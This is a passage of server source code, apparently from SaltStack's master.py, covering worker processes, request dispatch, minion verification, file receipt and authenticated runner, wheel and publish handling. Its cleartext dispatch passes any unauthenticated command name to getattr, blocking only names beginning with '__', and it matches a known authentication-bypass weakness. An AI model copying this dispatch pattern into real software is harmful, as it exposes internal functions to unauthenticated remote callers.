# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
state['key'],
state['mkey'],
secrets=state['secrets'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'key': self.key,
'mkey': self.master_key,
'secrets': self.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self.destroy(signum)
super(ReqServer, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Binds the reply server
'''
if self.log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
if self.log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level)
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
if self.secrets is not None:
SMaster.secrets = self.secrets
dfn = os.path.join(self.opts['cachedir'], '.dfn')
if os.path.isfile(dfn):
try:
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
os.remove(dfn)
except os.error:
pass
        # Wait for kill should be less than the parent ProcessManager's.
self.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager',
wait_for_kill=1)
req_channels = []
tcp_only = True
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.ReqServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
req_channels.append(chan)
if transport != 'tcp':
tcp_only = False
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = self.log_queue
kwargs['log_queue_level'] = self.log_queue_level
# Use one worker thread if only the TCP transport is set up on
# Windows and we are using Python 2. There is load balancer
# support on Windows for the TCP transport when using Python 3.
if tcp_only and six.PY2 and int(self.opts['worker_threads']) != 1:
log.warning('TCP transport supports only 1 worker on Windows '
'when using Python 2.')
self.opts['worker_threads'] = 1
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
for ind in range(int(self.opts['worker_threads'])):
name = 'MWorker-{0}'.format(ind)
self.process_manager.add_process(MWorker,
args=(self.opts,
self.master_key,
self.key,
req_channels,
name),
kwargs=kwargs,
name=name)
self.process_manager.run()
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self, signum=signal.SIGTERM):
if hasattr(self, 'process_manager'):
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
self.process_manager.kill_children()
def __del__(self):
self.destroy()
class MWorker(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
req_channels,
name,
**kwargs):
'''
Create a salt master worker process
:param dict opts: The salt options
:param dict mkey: The user running the salt master and the AES key
:param dict key: The user running the salt master and the RSA key
:rtype: MWorker
:return: Master worker
'''
kwargs['name'] = name
self.name = name
super(MWorker, self).__init__(**kwargs)
self.opts = opts
self.req_channels = req_channels
self.mkey = mkey
self.key = key
self.k_mtime = 0
self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0})
self.stat_clock = time.time()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self._is_child = True
super(MWorker, self).__init__(
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
self.opts = state['opts']
self.req_channels = state['req_channels']
self.mkey = state['mkey']
self.key = state['key']
self.k_mtime = state['k_mtime']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {
'opts': self.opts,
'req_channels': self.req_channels,
'mkey': self.mkey,
'key': self.key,
'k_mtime': self.k_mtime,
'secrets': SMaster.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe):
for channel in getattr(self, 'req_channels', ()):
channel.close()
super(MWorker, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Bind to the local port
'''
# using ZMQIOLoop since we *might* need zmq in there
install_zmq()
self.io_loop = ZMQDefaultLoop()
self.io_loop.make_current()
for req_channel in self.req_channels:
req_channel.post_fork(self._handle_payload, io_loop=self.io_loop) # TODO: cleaner? Maybe lazily?
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
# Tornado knows what to do
pass
@tornado.gen.coroutine
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
Example cleartext payload generated for 'salt myminion test.ping':
{'enc': 'clear',
'load': {'arg': [],
'cmd': 'publish',
'fun': 'test.ping',
'jid': '',
'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj',
'kwargs': {'show_jid': False, 'show_timeout': False},
'ret': '',
'tgt': 'myminion',
'tgt_type': 'glob',
'user': 'root'}}
:param dict payload: The payload route to the appropriate handler
'''
key = payload['enc']
load = payload['load']
ret = {'aes': self._handle_aes,
'clear': self._handle_clear}[key](load)
raise tornado.gen.Return(ret)
def _post_stats(self, start, cmd):
'''
Calculate the master stats and fire events with stat info
'''
end = time.time()
duration = end - start
self.stats[cmd]['mean'] = (self.stats[cmd]['mean'] * (self.stats[cmd]['runs'] - 1) + duration) / self.stats[cmd]['runs']
if end - self.stat_clock > self.opts['master_stats_event_iter']:
# Fire the event with the stats and wipe the tracker
self.aes_funcs.event.fire_event({'time': end - self.stat_clock, 'worker': self.name, 'stats': self.stats}, tagify(self.name, 'stats'))
self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0})
self.stat_clock = end
def _handle_clear(self, load):
'''
Process a cleartext command
:param dict load: Cleartext payload
:return: The result of passing the load to a function in ClearFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
log.trace('Clear payload received with command %s', load['cmd'])
cmd = load['cmd']
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
self.stats[cmd]['runs'] += 1
ret = getattr(self.clear_funcs, cmd)(load), {'fun': 'send_clear'}
if self.opts['master_stats']:
self._post_stats(start, cmd)
return ret
def _handle_aes(self, data):
'''
Process a command sent via an AES key
:param str load: Encrypted payload
:return: The result of passing the load to a function in AESFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
if 'cmd' not in data:
log.error('Received malformed command %s', data)
return {}
cmd = data['cmd']
log.trace('AES payload received with command %s', data['cmd'])
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
self.stats[cmd]['runs'] += 1
ret = self.aes_funcs.run_func(data['cmd'], data)
if self.opts['master_stats']:
self._post_stats(start, cmd)
return ret
def run(self):
'''
Start a Master Worker
'''
salt.utils.process.appendproctitle(self.name)
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
)
self.aes_funcs = AESFuncs(self.opts)
salt.utils.crypt.reinit_crypto()
self.__bind()
# TODO: rename? No longer tied to "AES", just "encrypted" or "private" requests
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts):
'''
Create a new AESFuncs
:param dict opts: The salt options
:rtype: AESFuncs
:returns: Instance for handling AES operations
'''
self.opts = opts
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
self.serial = salt.payload.Serial(opts)
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
self.__setup_fileserver()
self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts)
def __setup_fileserver(self):
'''
Set the local file objects from the file server interface
'''
# Avoid circular import
import salt.fileserver
self.fs_ = salt.fileserver.Fileserver(self.opts)
self._serve_file = self.fs_.serve_file
self._file_find = self.fs_._find_file
self._file_hash = self.fs_.file_hash
self._file_hash_and_stat = self.fs_.file_hash_and_stat
self._file_list = self.fs_.file_list
self._file_list_emptydirs = self.fs_.file_list_emptydirs
self._dir_list = self.fs_.dir_list
self._symlink_list = self.fs_.symlink_list
self._file_envs = self.fs_.envs
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
if not salt.utils.verify.valid_id(self.opts, id_):
return False
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
try:
pub = salt.crypt.get_rsa_pub_key(pub_path)
except (IOError, OSError):
log.warning(
'Salt minion claiming to be %s attempted to communicate with '
'master, but key could not be read and verification was denied.',
id_
)
return False
        except (ValueError, IndexError, TypeError) as err:
            log.error('Unable to load public key "%s": %s', pub_path, err)
            return False
try:
if salt.crypt.public_decrypt(pub, token) == b'salt':
return True
except ValueError as err:
log.error('Unable to decrypt token: %s', err)
log.error(
'Salt minion claiming to be %s has attempted to communicate with '
'the master and could not be verified', id_
)
return False
def verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
return self.__verify_minion(id_, token)
def __verify_minion_publish(self, clear_load):
'''
Verify that the passed information authorized a minion to execute
:param dict clear_load: A publication load from a minion
:rtype: bool
:return: A boolean indicating if the minion is allowed to publish the command in the load
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return False
if not isinstance(self.opts['peer'], dict):
return False
if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')):
return False
# If the command will make a recursive publish don't run
if clear_load['fun'].startswith('publish.'):
return False
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning(
'Minion id %s is not who it says it is and is attempting '
'to issue a peer command', clear_load['id']
)
return False
clear_load.pop('tok')
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
# finally, check the auth of the load
return self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
publish_validate=True)
def __verify_load(self, load, verify_keys):
'''
A utility function to perform common verification steps.
:param dict load: A payload received from a minion
:param list verify_keys: A list of strings that should be present in a
given load
        :rtype: dict | bool
:return: The original load (except for the token) if the load can be
verified. False if the load is invalid.
'''
if any(key not in load for key in verify_keys):
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return False
if 'tok' in load:
load.pop('tok')
return load
def _master_tops(self, load):
'''
Return the results from an external node classifier if one is
specified
:param dict load: A payload received from a minion
:return: The results from an external node classifier
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
return self.masterapi._master_tops(load, skip_verify=True)
# Needed so older minions can request master_tops
_ext_nodes = _master_tops
def _master_opts(self, load):
'''
Return the master options to the minion
:param dict load: A payload received from a minion
:rtype: dict
:return: The master options
'''
mopts = {}
file_roots = {}
envs = self._file_envs()
for saltenv in envs:
if saltenv not in file_roots:
file_roots[saltenv] = []
mopts['file_roots'] = file_roots
mopts['top_file_merging_strategy'] = self.opts['top_file_merging_strategy']
mopts['env_order'] = self.opts['env_order']
mopts['default_top'] = self.opts['default_top']
if load.get('env_only'):
return mopts
mopts['renderer'] = self.opts['renderer']
mopts['failhard'] = self.opts['failhard']
mopts['state_top'] = self.opts['state_top']
mopts['state_top_saltenv'] = self.opts['state_top_saltenv']
mopts['nodegroups'] = self.opts['nodegroups']
mopts['state_auto_order'] = self.opts['state_auto_order']
mopts['state_events'] = self.opts['state_events']
mopts['state_aggregate'] = self.opts['state_aggregate']
mopts['jinja_env'] = self.opts['jinja_env']
mopts['jinja_sls_env'] = self.opts['jinja_sls_env']
mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks']
mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks']
return mopts
def _mine_get(self, load):
'''
Gathers the data from the specified minions' mine
:param dict load: A payload received from a minion
:rtype: dict
:return: Mine data from the specified minions
'''
load = self.__verify_load(load, ('id', 'tgt', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_get(load, skip_verify=True)
def _mine(self, load):
'''
Store the mine data
:param dict load: A payload received from a minion
:rtype: bool
:return: True if the data has been stored in the mine
'''
load = self.__verify_load(load, ('id', 'data', 'tok'))
if load is False:
return {}
return self.masterapi._mine(load, skip_verify=True)
def _mine_delete(self, load):
'''
Allow the minion to delete a specific function from its own mine
:param dict load: A payload received from a minion
:rtype: bool
:return: Boolean indicating whether or not the given function was deleted from the mine
'''
load = self.__verify_load(load, ('id', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_delete(load)
def _mine_flush(self, load):
'''
Allow the minion to delete all of its own mine contents
:param dict load: A payload received from a minion
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_flush(load, skip_verify=True)
def _file_recv(self, load):
'''
Allows minions to send files to the master, files are sent to the
master file cache
'''
if any(key not in load for key in ('id', 'path', 'loc')):
return False
if not isinstance(load['path'], list):
return False
if not self.opts['file_recv']:
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
file_recv_max_size = 1024*1024 * self.opts['file_recv_max_size']
if 'loc' in load and load['loc'] < 0:
log.error('Invalid file pointer: load[loc] < 0')
return False
if len(load['data']) + load.get('loc', 0) > file_recv_max_size:
log.error(
'file_recv_max_size limit of %d MB exceeded! %s will be '
'truncated. To successfully push this file, adjust '
'file_recv_max_size to an integer (in MB) large enough to '
                'accommodate it.', self.opts['file_recv_max_size'], load['path']
)
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return {}
load.pop('tok')
# Join path
sep_path = os.sep.join(load['path'])
# Path normalization should have been done by the sending
# minion but we can't guarantee it. Re-do it here.
normpath = os.path.normpath(sep_path)
# Ensure that this safety check is done after the path
        # has been normalized.
if os.path.isabs(normpath) or '../' in load['path']:
# Can overwrite master files!!
return False
cpath = os.path.join(
self.opts['cachedir'],
'minions',
load['id'],
'files',
normpath)
# One last safety check here
if not os.path.normpath(cpath).startswith(self.opts['cachedir']):
log.warning(
'Attempt to write received file outside of master cache '
'directory! Requested path: %s. Access denied.', cpath
)
return False
cdir = os.path.dirname(cpath)
if not os.path.isdir(cdir):
try:
os.makedirs(cdir)
except os.error:
pass
if os.path.isfile(cpath) and load['loc'] != 0:
mode = 'ab'
else:
mode = 'wb'
with salt.utils.files.fopen(cpath, mode) as fp_:
if load['loc']:
fp_.seek(load['loc'])
fp_.write(salt.utils.stringutils.to_bytes(load['data']))
return True
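    # Note (added for clarity, not in the original source): the traversal
    # guards above work in two stages. A load whose normalized path is
    # absolute, or whose 'path' list contains a literal '../' element, is
    # rejected immediately; anything that still normalizes to a location
    # outside self.opts['cachedir'] is caught by the final
    # os.path.normpath(cpath).startswith(...) check before any bytes are
    # written under cachedir/minions/<id>/files/.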
def _pillar(self, load):
'''
Return the pillar data for the minion
:param dict load: Minion payload
:rtype: dict
:return: The pillar data for the minion
'''
if any(key not in load for key in ('id', 'grains')):
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
load['grains']['id'] = load['id']
pillar = salt.pillar.get_pillar(
self.opts,
load['grains'],
load['id'],
load.get('saltenv', load.get('env')),
ext=load.get('ext'),
pillar_override=load.get('pillar_override', {}),
pillarenv=load.get('pillarenv'),
extra_minion_data=load.get('extra_minion_data'))
data = pillar.compile_pillar()
self.fs_.update_opts()
if self.opts.get('minion_data_cache', False):
self.masterapi.cache.store('minions/{0}'.format(load['id']),
'data',
{'grains': load['grains'],
'pillar': data})
if self.opts.get('minion_data_cache_events') is True:
self.event.fire_event({'Minion data cache refresh': load['id']}, tagify(load['id'], 'refresh', 'minion'))
return data
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
:param dict load: The minion payload
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
# Route to master event bus
self.masterapi._minion_event(load)
# Process locally
self._handle_minion_event(load)
def _handle_minion_event(self, load):
'''
Act on specific events from minions
'''
id_ = load['id']
if load.get('tag', '') == '_salt_error':
log.error(
'Received minion error from [%s]: %s',
id_, load['data']['message']
)
for event in load.get('events', []):
event_data = event.get('data', {})
if 'minions' in event_data:
jid = event_data.get('jid')
if not jid:
continue
minions = event_data['minions']
try:
salt.utils.job.store_minions(
self.opts,
jid,
minions,
mminion=self.mminion,
syndic_id=id_)
except (KeyError, salt.exceptions.SaltCacheError) as exc:
log.error(
'Could not add minion(s) %s for job %s: %s',
minions, jid, exc
)
def _return(self, load):
'''
Handle the return data sent from the minions.
Takes the return, verifies it and fires it on the master event bus.
Typically, this event is consumed by the Salt CLI waiting on the other
end of the event bus but could be heard by any listener on the bus.
:param dict load: The minion payload
'''
if self.opts['require_minion_sign_messages'] and 'sig' not in load:
log.critical(
'_return: Master is requiring minions to sign their '
'messages, but there is no signature in this payload from '
'%s.', load['id']
)
return False
if 'sig' in load:
log.trace('Verifying signed event publish from minion')
sig = load.pop('sig')
this_minion_pubkey = os.path.join(self.opts['pki_dir'], 'minions/{0}'.format(load['id']))
serialized_load = salt.serializers.msgpack.serialize(load)
if not salt.crypt.verify_signature(this_minion_pubkey, serialized_load, sig):
log.info('Failed to verify event signature from minion %s.', load['id'])
if self.opts['drop_messages_signature_fail']:
log.critical(
'Drop_messages_signature_fail is enabled, dropping '
'message from %s', load['id']
)
return False
else:
log.info('But \'drop_message_signature_fail\' is disabled, so message is still accepted.')
load['sig'] = sig
try:
salt.utils.job.store_job(
self.opts, load, event=self.event, mminion=self.mminion)
except salt.exceptions.SaltCacheError:
log.error('Could not store job information for load: %s', load)
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
:param dict load: The minion payload
'''
loads = load.get('load')
if not isinstance(loads, list):
loads = [load] # support old syndics not aggregating returns
for load in loads:
# Verify the load
if any(key not in load for key in ('return', 'jid', 'id')):
continue
# if we have a load, save it
if load.get('load'):
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](load['jid'], load['load'])
# Register the syndic
syndic_cache_path = os.path.join(self.opts['cachedir'], 'syndics', load['id'])
if not os.path.exists(syndic_cache_path):
path_name = os.path.split(syndic_cache_path)[0]
if not os.path.exists(path_name):
os.makedirs(path_name)
with salt.utils.files.fopen(syndic_cache_path, 'w') as wfh:
wfh.write('')
# Format individual return loads
for key, item in six.iteritems(load['return']):
ret = {'jid': load['jid'],
'id': key}
ret.update(item)
if 'master_id' in load:
ret['master_id'] = load['master_id']
if 'fun' in load:
ret['fun'] = load['fun']
if 'arg' in load:
ret['fun_args'] = load['arg']
if 'out' in load:
ret['out'] = load['out']
if 'sig' in load:
ret['sig'] = load['sig']
self._return(ret)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
:param dict clear_load: The minion payload
:rtype: dict
:return: The runner function data
'''
load = self.__verify_load(clear_load, ('fun', 'arg', 'id', 'tok'))
if load is False:
return {}
else:
return self.masterapi.minion_runner(clear_load)
def pub_ret(self, load):
'''
Request the return data from a specific jid, only allowed
        if the requesting minion also initiated the execution.
:param dict load: The minion payload
:rtype: dict
:return: Return data corresponding to a given JID
'''
load = self.__verify_load(load, ('jid', 'id', 'tok'))
if load is False:
return {}
# Check that this minion can access this data
auth_cache = os.path.join(
self.opts['cachedir'],
'publish_auth')
if not os.path.isdir(auth_cache):
os.makedirs(auth_cache)
jid_fn = os.path.join(auth_cache, six.text_type(load['jid']))
with salt.utils.files.fopen(jid_fn, 'r') as fp_:
if not load['id'] == fp_.read():
return {}
# Grab the latest and return
return self.local.get_cache_returns(load['jid'])
def minion_pub(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
This configuration will enable all minions to execute all commands:
.. code-block:: bash
peer:
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
        :param dict clear_load: The minion payload
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_pub(clear_load)
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
        This configuration will enable all minions to execute all commands:
        .. code-block:: bash
            peer:
                foo.example.com:
                    - test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion payload
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_publish(clear_load)
def revoke_auth(self, load):
'''
Allow a minion to request revocation of its own key
:param dict load: The minion payload
        :rtype: dict | bool
        :return: False if the load cannot be verified, the verified load if
            minion key revocation is disabled on the master (no key operation
            is performed), otherwise True if the key was revoked and False if
            not.
'''
load = self.__verify_load(load, ('id', 'tok'))
if not self.opts.get('allow_minion_key_revoke', False):
log.warning(
'Minion %s requested key revoke, but allow_minion_key_revoke '
'is set to False', load['id']
)
return load
if load is False:
return load
else:
return self.masterapi.revoke_auth(load)
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
:param function func: The function to run
:return: The result of the master function that was called
'''
# Don't honor private functions
if func.startswith('__'):
# TODO: return some error? Seems odd to return {}
return {}, {'fun': 'send'}
# Run the func
if hasattr(self, func):
try:
start = time.time()
ret = getattr(self, func)(load)
log.trace(
'Master function call %s took %s seconds',
func, time.time() - start
)
except Exception:
ret = ''
log.error('Error in function %s:\n', func, exc_info=True)
else:
log.error(
'Received function %s which is unavailable on the master, '
'returning False', func
)
return False, {'fun': 'send'}
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret, {'fun': 'send'}
if func == '_pillar' and 'id' in load:
if load.get('ver') != '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return ret, {'fun': 'send'}
return ret, {'fun': 'send_private', 'key': 'pillar', 'tgt': load['id']}
# Encrypt the return
return ret, {'fun': 'send'}
class ClearFuncs(object):
'''
    Set up functions that are safe to execute when commands are sent to the
    master without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key):
self.opts = opts
self.key = key
# Create the event manager
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Make an minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
# Make a masterapi object
self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key)
def runner(self, clear_load):
'''
Send a master control function back to the runner system
'''
# All runner ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
runner_check = self.ckminions.runner_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not runner_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(runner_check, dict) and 'error' in runner_check:
# A dictionary with an error name/message was handled by ckminions.runner_check
return runner_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
fun = clear_load.pop('fun')
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.async(fun,
clear_load.get('kwarg', {}),
username)
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
return {'error': {'name': exc.__class__.__name__,
'args': exc.args,
'message': six.text_type(exc)}}
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
wheel_check = self.ckminions.wheel_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not wheel_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(wheel_check, dict) and 'error' in wheel_check:
# A dictionary with an error name/message was handled by ckminions.wheel_check
return wheel_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
jid = salt.utils.jid.gen_jid(self.opts)
fun = clear_load.pop('fun')
tag = tagify(jid, prefix='wheel')
data = {'fun': "wheel.{0}".format(fun),
'jid': jid,
'tag': tag,
'user': username}
self.event.fire_event(data, tagify([jid, 'new'], 'wheel'))
ret = self.wheel_.call_func(fun, full_return=True, **clear_load)
data['return'] = ret['return']
data['success'] = ret['success']
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format(
fun,
exc.__class__.__name__,
exc,
)
data['success'] = False
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
def mk_token(self, clear_load):
'''
Create and return an authentication token, the clear load needs to
contain the eauth key and the needed authentication creds.
'''
token = self.loadauth.mk_token(clear_load)
if not token:
log.warning('Authentication failure of type "eauth" occurred.')
return ''
return token
def get_token(self, clear_load):
'''
Return the name associated with a token or False if the token is invalid
'''
if 'token' not in clear_load:
return False
return self.loadauth.get_tok(clear_load['token'])
def publish(self, clear_load):
'''
This method sends out publications to the minions, it can only be used
by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
publisher_acl = salt.acl.PublisherACL(self.opts['publisher_acl_blacklist'])
if publisher_acl.user_is_blacklisted(clear_load['user']) or \
publisher_acl.cmd_is_blacklisted(clear_load['fun']):
log.error(
'%s does not have permissions to run %s. Please contact '
'your local administrator if you believe this is in '
'error.\n', clear_load['user'], clear_load['fun']
)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Retrieve the minions list
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
_res = self.ckminions.check_minions(
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
delimiter
)
minions = _res.get('minions', list())
missing = _res.get('missing', list())
ssh_minions = _res.get('ssh_minions', False)
# Check for external auth calls and authenticate
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(extra)
if auth_type == 'user':
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
else:
auth_check = self.loadauth.check_authentication(extra, auth_type)
# Setup authorization list variable and error information
auth_list = auth_check.get('auth_list', [])
err_msg = 'Authentication failure of type "{0}" occurred.'.format(auth_type)
if auth_check.get('error'):
# Authentication error occurred: do not continue.
log.warning(err_msg)
return {'error': {'name': 'AuthenticationError',
'message': 'Authentication error occurred.'}}
# All Token, Eauth, and non-root users must pass the authorization check
if auth_type != 'user' or (auth_type == 'user' and auth_list):
# Authorize the request
authorized = self.ckminions.auth_check(
auth_list,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
minions=minions,
# always accept find_job
whitelist=['saltutil.find_job'],
)
if not authorized:
# Authorization error occurred. Do not continue.
log.warning(err_msg)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Perform some specific auth_type tasks after the authorization check
if auth_type == 'token':
username = auth_check.get('username')
clear_load['user'] = username
log.debug('Minion tokenized user = "%s"', username)
elif auth_type == 'eauth':
# The username we are attempting to auth with
